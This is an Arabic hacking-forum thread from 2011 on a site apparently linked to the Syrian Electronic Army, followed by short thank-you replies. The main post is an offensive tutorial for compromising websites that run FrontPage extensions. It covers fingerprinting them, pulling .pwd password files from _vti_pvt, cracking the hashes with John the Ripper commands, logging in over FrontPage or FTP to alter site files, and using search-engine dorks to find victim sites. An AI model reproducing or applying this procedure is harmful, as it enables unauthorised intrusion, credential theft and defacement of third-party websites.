منتديات عالم الكمبيوتر السوري

أهـلا وسـهـلا بك زائرنا الكريـــم
نورت غالــي تفضل إضغط تسجيل
وشاركنا أيد بأيد ونورنا بمواضيعك
حارب بكل ما استعطت من قوة
لرد هذه الهجمة الكونية على بلدنا
وكون عضو هام وفعال وتميـــز
بإبداعاتك مع تحياتـنـا ......
منتديات الجيش السوري الإلكتروني

نحن فريق من الشباب السوري لديه خبرة واسعة في مجال تكنولوجيا المعلومات والأمن المعلوماتي


    اختراق المواقع التي تدعم الفرونت بيج

    شاطر
    avatar
    محمد علي اسماعيل

    عدد المساهمات : 31
    نقاط : 2358
    السٌّمعَة : 1
    تاريخ التسجيل : 02/08/2011

    اختراق المواقع التي تدعم الفرونت بيج

    مُساهمة من طرف محمد علي اسماعيل في الثلاثاء نوفمبر 22, 2011 2:48 am

    اختراق المواقع التي تدعم الفرونت بيج



    بالذهاب إلى موقع netcraft
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    وكتابة اسم الموقع وبعد البحث سوف يظهر
    mod_frontpage/x
    x=(رقم الإصدار الخاص بالفرونت بيج)
    - عن طريق إضافة جملة
    vti_inf.html_/
    بعد عنوان الموقع لنفرض أن الموقع:http://www.almodammer.com/
    نضيف الجملة ليصبح بهذه الطريقة
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    وبعدها اضغط Enter
    وراح يطلعلك في أول الصفحة هذه الكلمة
    Frontpage Configuration Information
    أي قد تم تثبيت مجلدات وبرامج الفرونت بيج
    - وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا
    بإضافة
    vti_cnf_/
    بعد عنوان الموقع كهذا المثال:
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    واضغط زر الفأرة الأيمن واختار
    source المصدر
    وابحث عن
    vti_generator:Programe
    حيث
    Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به

    --------------------------------------------------

    2- ألحين وعرفنا الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟
    بسيطة إنت هات الموقع الي يبدعم frontpage واعلمك
    يعني وعلى سبيل المثال
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    يدعم fontpage طيب نذهب إلى ملف vti_pvt_
    كذا يعني
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:
    =============
    Adminstrator.pwd
    Adminstrators.pwd
    Service.pwd
    Users.pwd
    User.pwd
    Author.pwd
    =============

    ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود
    username:passwd
    اسم المستخدم والباسوورد
    يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف service يحتوي على user / password
    وهذا مضمون الملف
    operator:hi9LHn9wAMuKM
    حيث اسم المستخدم:operator
    الباسوورد المشفرة هي:hi9LHn9wAMuKM

    ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره
    وهذا يتم ببرامج كثير
    =(Crack Jack)=
    =(John The Ripper)=

    راح نستخدم الأفضل والأكثر تداولا وهو
    John The Ripper
    لتحميل البرنامج من هذا الموقع::
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

    كيف تفك التشفير بهذا البرنامج

    أول شي تروح تنقل البرنامج إلى مجلد
    \:c
    بعدين تفتح مجلد RUN
    وتسويلك مستند نصي txt وتسمي الملف passwd وتضع فيه كلمة السر الي تبي تفك تشفيرها
    إذهب إلى
    ابدأ start
    تشغيل run
    اكتب الأمر
    command
    اضغط على Enter وبعدها راح يفتح
    إطار الـDoS
    اذهب إلى مجلد RUN
    وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم الأمر
    ..cd
    حتى توصل
    <\:c
    بعدين اكتب
    cd john
    اضغط على Enter
    وراح يظهر لك بهذا الشكل
    <c:\john
    واكتب
    cd RUN
    وبتدخل المجلد ليصبح بهذه الطريقة
    <c:/john/RUN
    ألحين نكتب أوامر برنامج John The Ripper
    وهي
    ====
    john -i:all passd.txt
    --------------------------
    يبحث لك عن جميع الأنواع والاحتمالات

    ====
    john -i:Alpha passwd.txt
    ----------------------------------
    يبحث عن الأحرف الصغيرة

    ====
    john -i:Digits passwd.txt
    ----------------------------------
    يبحث عن الأرقام

    ====
    john -single passwd.txt
    ---------------------------------
    أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم

    --------------------------------------------------------------------------------
    وبعد ماتجرب كل هذي الأوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ولا لأ إذهب إلى
    john.pot
    الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها
    --------------------------------------------------------------------------------

    إنت ألحين مستريح عندك username والـpassword
    وش بقالك ؟!!

    يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/
    (1)
    frontpage
    بعدين
    file وتذهب إلى
    open web وتضيف
    الاسم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك

    (2)
    من FTP
    وعليك ببرامج الـFTP المنتشرة
    كالـws-ftp
    والـpro ftp
    والمزيد ...
    ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك

    ======================================

    وألحين أكيد تبون تجربون على موقع أقولكم روحوا google
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    واكتبوا في إطار البحث
    vti_pvt_/
    وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة

    وعندك محرك بحث
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    تكتب في محرك البحث
    link:service.pwd

    أو..
    link:adminstrators

    وغيرها من الملفات الاحتمال وجود password فيها.

    :تحية عطره لقائد الأمة الفريق الدكتور بشار حافظ الأسد:
    avatar
    كادي

    عدد المساهمات : 817
    نقاط : 3203
    السٌّمعَة : 132
    تاريخ التسجيل : 14/11/2011

    رد: اختراق المواقع التي تدعم الفرونت بيج

    مُساهمة من طرف كادي في السبت ديسمبر 03, 2011 1:13 pm



    وعليكم السلام ورحمة الله وبركاته


    وتحيه كلها عطر ياسمين لحضرتك اخوي على

    المعلومات الاكثر من رائعه

    دمت بخير


    _________________
    منصــــــــــــوره يــــا بــــــــلادي
    avatar
    roro

    عدد المساهمات : 617
    نقاط : 3016
    السٌّمعَة : 43
    تاريخ التسجيل : 30/10/2011
    العمر : 29

    رد: اختراق المواقع التي تدعم الفرونت بيج

    مُساهمة من طرف roro في الثلاثاء ديسمبر 06, 2011 1:46 am

    معلومات رائعة اخي محمد شكرا كتيييييييييييييييييييييييير

      الوقت/التاريخ الآن هو الأربعاء نوفمبر 22, 2017 3:13 pm